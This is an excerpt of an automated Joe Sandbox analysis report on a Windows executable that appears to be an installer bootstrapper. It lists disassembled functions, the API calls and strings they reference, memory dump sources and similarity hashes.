GetLastError.KERNEL32 ref: 000D884C
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000D8874
GetLastError.KERNEL32 ref: 000D887E

Strings

feclient.dll, xrefs: 000D8814
inetutil.cpp, xrefs: 000D889F
Qd, xrefs: 000D8803

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastTime$FileSystem
String ID: Qd$feclient.dll$inetutil.cpp
API String ID: 1528435940-1281767629
Opcode ID: 61d7cff255e1dff8f401ff89e101073667b012e1360a9cc05ca3ebc24301a5e4
Instruction ID: 86fc38b93deecaff1596381fb2e44a41fe42a668ea4fbeaf24d50c6223d4597d
Opcode Fuzzy Hash: 61d7cff255e1dff8f401ff89e101073667b012e1360a9cc05ca3ebc24301a5e4
Instruction Fuzzy Hash: 06115172A01229ABE7609BB9CD44BBBB7E8EF48350F124526AE05E7150EA249D0497F1

Function 000D3B4A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 000D3B98
GetLastError.KERNEL32(?,?,00000000), ref: 000D3BA2
CloseHandle.KERNEL32(?,?,?,00000000), ref: 000D3BD5

Strings

<, xrefs: 000D3B8A
shelutil.cpp, xrefs: 000D3BC3
PDu, xrefs: 000D3B98

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseErrorExecuteHandleLastShell
String ID: <$PDu$shelutil.cpp
API String ID: 3023784893-2418939910
Opcode ID: 7d2fa29609c3b7878e174ad6be91917d2c9f39602aeefe248af5e4532a2e96b4
Instruction ID: a2a678903f75d58372e40ee3f763c97d062065e46416740c0b619da8e06ad9ec
Opcode Fuzzy Hash: 7d2fa29609c3b7878e174ad6be91917d2c9f39602aeefe248af5e4532a2e96b4
Instruction Fuzzy Hash: D911E4B5E01219AFDB50DFA9D844ADEBBF8AF08750F00412AFD19E7350E7349A00CBA5

Function 00099908 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 57COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 0009997F

Strings

Failed to select condition node., xrefs: 00099936
=S, xrefs: 00099908
Condition, xrefs: 0009991A
Failed to get Condition inner text., xrefs: 0009994F
Failed to copy condition string from BSTR, xrefs: 00099969

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FreeString
String ID: =S$Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
API String ID: 3341692771-1315426573
Opcode ID: 30926b1799fd3a8db3478d3e1468cbe914c870d7fc9e9b23434699553991b591
Instruction ID: 29bdd27daf43463670d394758796523de1c8a9d2406793e08b52ace424f4e455
Opcode Fuzzy Hash: 30926b1799fd3a8db3478d3e1468cbe914c870d7fc9e9b23434699553991b591
Instruction Fuzzy Hash: C8118E32951328BBDF269A98CD06BADBBA8AB10750F10415EF800BA250DB719E10F6A1

Function 000D9555 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 000D9584
KERNEL32.DLL, xrefs: 000D956F
ReleaseSRWLockExclusive, xrefs: 000D9594

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: c4c3ca5d16eeeb553f5c653509f3113f8531a7813a013e21b657eba7567ae352
Instruction ID: 626fafc70af62fe35438a5245383be54f3316ea2a95a000482517e1f7c9a72d2
Opcode Fuzzy Hash: c4c3ca5d16eeeb553f5c653509f3113f8531a7813a013e21b657eba7567ae352
Instruction Fuzzy Hash: 31012872746B229B5FB26EB5BC805BB37C89B41751300423BEA11C7B84D716C841EBF0

Function 000D09BB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00095D8F,00000000), ref: 000D09CF
GetProcAddress.KERNEL32(00000000), ref: 000D09D6
GetLastError.KERNEL32(?,?,?,00095D8F,00000000), ref: 000D09ED

Strings

IsWow64Process, xrefs: 000D09C0
kernel32, xrefs: 000D09C7
procutil.cpp, xrefs: 000D0A0E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: IsWow64Process$kernel32$procutil.cpp
API String ID: 4275029093-1586155540
Opcode ID: 3911994fe5083e3854b4507d74aeae2108e399086e411f37d5f4fd52348cf422
Instruction ID: 2f4f3c885cda3a73cc946b46c23ba80b2fe99e1fcb5b315a8310347be6312fef
Opcode Fuzzy Hash: 3911994fe5083e3854b4507d74aeae2108e399086e411f37d5f4fd52348cf422
Instruction Fuzzy Hash: C0F06871A01329EBE7209FA9DC05AAB7B98EF04751F014116BD09E7240DB75CE00D7F5

Function 000CA059 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000C3382,000C3382,?,?,?,000CA2AA,00000001,00000001,E3E85006), ref: 000CA0B3
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000CA2AA,00000001,00000001,E3E85006,?,?,?), ref: 000CA139
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,E3E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000CA233
__freea.LIBCMT ref: 000CA240

Part of subcall function 000C5154: HeapAlloc.KERNEL32(00000000,?,?,?,000C1E90,?,0000015D,?,?,?,?,000C32E9,000000FF,00000000,?,?), ref: 000C5186

__freea.LIBCMT ref: 000CA249
__freea.LIBCMT ref: 000CA26E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: 84ebc28d21bad6b1c7bb7152330725101bea7c190b9f91a57210486de5a3bc93
Instruction ID: 9e2783f42e3f40f44d515c8c60e81db45f543c971db4a6b1fcae8a5d693f9510
Opcode Fuzzy Hash: 84ebc28d21bad6b1c7bb7152330725101bea7c190b9f91a57210486de5a3bc93
Instruction Fuzzy Hash: 3651BE7270022AABEB258F68CC86FBF77AAEB46754F19422DFC04D6141EB35DC408661

Function 000D5D7F Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 159stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 000D5E3D
lstrlenW.KERNEL32(?), ref: 000D5E55

Strings

dlutil.cpp, xrefs: 000D5EDB
msasn1.dll, xrefs: 000D5DC2, 000D5EE8
Qd, xrefs: 000D5D7F

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: Qd$dlutil.cpp$msasn1.dll
API String ID: 1659193697-3914016852
Opcode ID: fcec5bb9c17c75413beda974a2aea24b945f2fa6519e23c405d991af1141411b
Instruction ID: 3c2df1ea25ee53001ad49c8bde6a9507de3d52cf5bc20c90ed0a7ec7ea3bb5ee
Opcode Fuzzy Hash: fcec5bb9c17c75413beda974a2aea24b945f2fa6519e23c405d991af1141411b
Instruction Fuzzy Hash: E3517072A01715ABDB21AFA5CC849AFBBF9EF48751B064026FE05A7350DB718D01DBB0

Function 000AF6B8 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000AF6D0
LeaveCriticalSection.KERNEL32(?,?), ref: 000AF81D

Strings

Failed to default local update source, xrefs: 000AF742
Failed to set update bundle., xrefs: 000AF7F3
Failed to recreate command-line for update bundle., xrefs: 000AF79C
update\%ls, xrefs: 000AF72E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
API String ID: 3168844106-1266646976
Opcode ID: 09e656f029c78b40b6c9475da56583799c31ae7bd350a1ea33e257f1f96f3906
Instruction ID: bf75a93087ff54617ba9a837b6a1f94973a89a85352e284c636312b15f00a7ca
Opcode Fuzzy Hash: 09e656f029c78b40b6c9475da56583799c31ae7bd350a1ea33e257f1f96f3906
Instruction Fuzzy Hash: 78418A3194421AEFDF219FD4CC46EBE77A4EF05310F018279F904AB161DB75AD509B90

Function 000A8AA3 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,00000000,00000000), ref: 000A8B0F

Strings

per-user, xrefs: 000A8B67, 000A8BA8
Failed to get %hs package cache root directory., xrefs: 000A8B70
Failed to get old %hs package cache root directory., xrefs: 000A8BB1
Failed to calculate cache path., xrefs: 000A8ACC
per-machine, xrefs: 000A8B62, 000A8B6F, 000A8BA3, 000A8BB0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Sleep
String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
API String ID: 3472027048-398165853
Opcode ID: ba8dbaf882166fe317e257fc8c03545a22cd640281f0cce44312fade67ea96d0
Instruction ID: d19401198f9305d67043dd5a4fb86880906dba3493fcfae5db8711a0aaf21634
Opcode Fuzzy Hash: ba8dbaf882166fe317e257fc8c03545a22cd640281f0cce44312fade67ea96d0
Instruction Fuzzy Hash: F531E6B2A50218BBEB11AAA58C47FBFB66CDF11750F014025FE05F6242DF758E0057B1

Function 000AE705 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 000AE734
SetWindowLongW.USER32(?,000000EB,00000000), ref: 000AE743
SetWindowLongW.USER32(?,000000EB,?), ref: 000AE757
DefWindowProcW.USER32(?,?,?,?), ref: 000AE767
GetWindowLongW.USER32(?,000000EB), ref: 000AE781
PostQuitMessage.USER32(00000000), ref: 000AE7DE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: dc2b109c97baf5f88fa76331795e902a2b0138647bf3d71525e551b7ccfb804b
Instruction ID: 75640a0c95a1b8b70ebc172ee0fe463cbe9288958a145490c8ae88b2b6d842a5
Opcode Fuzzy Hash: dc2b109c97baf5f88fa76331795e902a2b0138647bf3d71525e551b7ccfb804b
Instruction Fuzzy Hash: 7B21A132108118FFEF119FA8DC48EAE7BA9EF46350F158525F906AA1A1C731DD10EB60

Function 000C6A76 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000C6B01
__alldvrm.LIBCMT ref: 000C6D02
__alldvrm.LIBCMT ref: 000C6D24

Strings

arguments for passthrough bundle package, xrefs: 000C6BBC

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID: arguments for passthrough bundle package
API String ID: 1036877536-1749814842
Opcode ID: f3a74c95afe91129e83f4a200ae329e72b68e1b987d16e4549aa364eb4fd1ab8
Instruction ID: dd888e10c3ae2ea1edb0a28df7e71b7472adc448cd54883dd2c5c49f3e4a7f25
Opcode Fuzzy Hash: f3a74c95afe91129e83f4a200ae329e72b68e1b987d16e4549aa364eb4fd1ab8
Instruction Fuzzy Hash: D6A14572A003869FDB35CF28C891FBEBBE5EF55310F1841AEE5859B282C6369D41CB51

Function 000AC59C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?), ref: 000AC5E4
CloseHandle.KERNEL32(?), ref: 000AC5EC

Strings

Unexpected elevated message sent to child process, msg: %u, xrefs: 000AC794
Failed to save state., xrefs: 000AC661
elevation.cpp, xrefs: 000AC788

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
API String ID: 4207627910-1576875097
Opcode ID: 06984ab6832c7c894803b6ea7f45d85fbd86bd73fce5652d54af694165d4867e
Instruction ID: 7b3fb42ab9db8bed17d5062367431519d7754f6cfce8cd040c082a7f037bd8c7
Opcode Fuzzy Hash: 06984ab6832c7c894803b6ea7f45d85fbd86bd73fce5652d54af694165d4867e
Instruction Fuzzy Hash: 1561D83A104514FFDB229F94CD41C59BBB2FF0A310716C559FA695A632C732E921EF41

Function 000D10C5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000D10ED
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,000A6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 000D1126
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 000D121A

Strings

BundleUpgradeCode, xrefs: 000D10CC
regutil.cpp, xrefs: 000D1161

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: 97a800e983cf0254511e6b698a9f3ea71e6c65d09e4b7920a669fe46d70096ce
Instruction ID: 6ec898f86b300704145bcaa4c37a7e7bd73718c523aa26ba9c1a9e00d5b2aeb2
Opcode Fuzzy Hash: 97a800e983cf0254511e6b698a9f3ea71e6c65d09e4b7920a669fe46d70096ce
Instruction Fuzzy Hash: CC41BE35A0031ABBDB258F98C885AFEB7B9EF44710B11416AED15EB310DA35ED119BA0

Function 000D61FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000D47D3: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,000A8564,00000000,00000000,00000000,00000000,00000000), ref: 000D47EB
Part of subcall function 000D47D3: GetLastError.KERNEL32(?,?,?,000A8564,00000000,00000000,00000000,00000000,00000000), ref: 000D47F5

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000D5AC5,?,?,?,?,?,?,?,00010000,?), ref: 000D6263
WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,000D5AC5,?,?,?,?), ref: 000D62B5
GetLastError.KERNEL32(?,000D5AC5,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 000D62FB
GetLastError.KERNEL32(?,000D5AC5,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 000D6321

Strings

dlutil.cpp, xrefs: 000D6345

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$Write$Pointer
String ID: dlutil.cpp
API String ID: 133221148-2067379296
Opcode ID: a7ab974a9c45f0ebfbbedbe9bae1d5bc5f2466dc4da79ff23708391695936e0c
Instruction ID: 5180f9f0886f46cbbbca55c01e22e8241f33915f9331bcc405f4be35b1ba90db
Opcode Fuzzy Hash: a7ab974a9c45f0ebfbbedbe9bae1d5bc5f2466dc4da79ff23708391695936e0c
Instruction Fuzzy Hash: 20415E72900719EFEB118E94CD44BEA7BA8EF04351F15012ABD04E6290D776DD60DAB0

Function 00092436 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,000CFEE7,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000CFEE7,?,00000000,00000000), ref: 0009247C
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000CFEE7,?,00000000,00000000,0000FDE9), ref: 00092488

Part of subcall function 00093B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000921DC,000001C7,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00093B59
Part of subcall function 00093B51: HeapSize.KERNEL32(00000000,?,000921DC,000001C7,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00093B60

Strings

strutil.cpp, xrefs: 000924AC

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: c783996e7b63c49d1ca3dc2f9249480e6b113ce743656aa8b6456143edf400da
Instruction ID: 4100dc0864d492de16ef398a8a628c5e10385aa0d5134dd2b29b0bc0250a33c6
Opcode Fuzzy Hash: c783996e7b63c49d1ca3dc2f9249480e6b113ce743656aa8b6456143edf400da
Instruction Fuzzy Hash: 0731C071240719FFFF109E688C84ABA72DDEB44364B11422AFD25DB1A0EB75CC40AB70

Function 000BAAE8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract all payloads from container: %ls, xrefs: 000BAB9C
Failed to open container: %ls., xrefs: 000BAB2A
Failed to extract payload: %ls from container: %ls, xrefs: 000BABE3
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 000BABEF

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
API String ID: 1214770103-3891707333
Opcode ID: 343cc0df8e6120ef4987f3191f452838bc938a171e647861d70c02790ab47781
Instruction ID: 2de9bedf5dd10ee02a8b5b9bfcdcefba9b35fd11fa52a69ef016d691060930bb
Opcode Fuzzy Hash: 343cc0df8e6120ef4987f3191f452838bc938a171e647861d70c02790ab47781
Instruction Fuzzy Hash: 78318532E00219FBCF119AE4CC42EDE77A9AF05710F204565FD21AA192D7319A51DBA5

Function 000D40C8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,000D4203,00000003,00000001,00000001,000007D0,00000003,00000000,?,000A9E5F,00000000), ref: 000D40ED
GetLastError.KERNEL32(00000001,?,000D4203,00000003,00000001,00000001,000007D0,00000003,00000000,?,000A9E5F,00000000,000007D0,00000001,00000001,00000003), ref: 000D40FC
MoveFileExW.KERNEL32(00000003,00000001,000007D0,00000001,00000000,?,000D4203,00000003,00000001,00000001,000007D0,00000003,00000000,?,000A9E5F,00000000), ref: 000D417F
GetLastError.KERNEL32(?,000D4203,00000003,00000001,00000001,000007D0,00000003,00000000,?,000A9E5F,00000000,000007D0,00000001,00000001,00000003,000007D0), ref: 000D4189

Strings

fileutil.cpp, xrefs: 000D41A7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastMove
String ID: fileutil.cpp
API String ID: 55378915-2967768451
Opcode ID: c85e238e798660a61519d775d5d31a47b2cf73cb6017d12a745c90de94d3b4d7
Instruction ID: 50f1fe5f9a60fca5cf0aa5899b40ea29ff2741c7ef55193e9fc3e0f40ed5e1f6
Opcode Fuzzy Hash: c85e238e798660a61519d775d5d31a47b2cf73cb6017d12a745c90de94d3b4d7
Instruction Fuzzy Hash: 5B21E43A641326ABEF211E648C8167FB6D5EF657A1F020127FD4597350DB318C9192F0

Function 000D4212 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D4315: FindFirstFileW.KERNEL32(000B8FFA,?,000002C0,00000000,00000000), ref: 000D4350
Part of subcall function 000D4315: FindClose.KERNEL32(00000000), ref: 000D435C

